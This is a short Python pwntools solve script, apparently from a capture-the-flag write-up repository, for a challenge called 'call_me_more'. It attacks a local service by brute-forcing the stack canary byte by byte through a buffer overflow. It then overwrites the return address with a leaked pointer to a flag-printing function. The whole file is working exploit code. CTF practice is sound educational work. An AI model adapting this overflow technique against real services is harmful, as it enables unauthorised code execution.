write-ups-challenges-2019-2020/call_me_more/solve/solve.py

42 lines
855 B
Python
Raw Permalink Normal View History

2022-11-24 21:43:03 +00:00
from pwn import *
context.log_level = 'error'
offset = 32
y = 0
buf = ("A"*offset + "B"*8) #+ p64(0xead62b27d92cf000) # +chr(0)+chr(191)+chr(217)+chr(151)+chr(59)+chr(107)+chr(161)+chr(22)
i=0
g=0
while i != 0x100 and g<8:
r = remote('127.0.0.1', 2345)
r.recvuntil("Pointer to printflag is 0x")
addr = int(r.recvuntil("\n"), 16)
#print("Pointer is %x" % addr)
exploit = buf + chr(i) #+ p64(addr)
r.send(exploit)
try:
r.recvuntil("Wrong!")
buf = buf + chr(i)
print(str(i))
i=0
g=g+1
except:
print ".",
i=i+1
r.close()
r = remote('127.0.0.1', 2345)
stdout = r.recvuntil("Pointer to printflag is 0x")
addr = int(r.recvuntil("\n"), 16)
print("Pointer is %x" % addr)
exploit = buf + p64(addr) + p64(addr)
print(exploit)
r.send(exploit)
print(r.recv())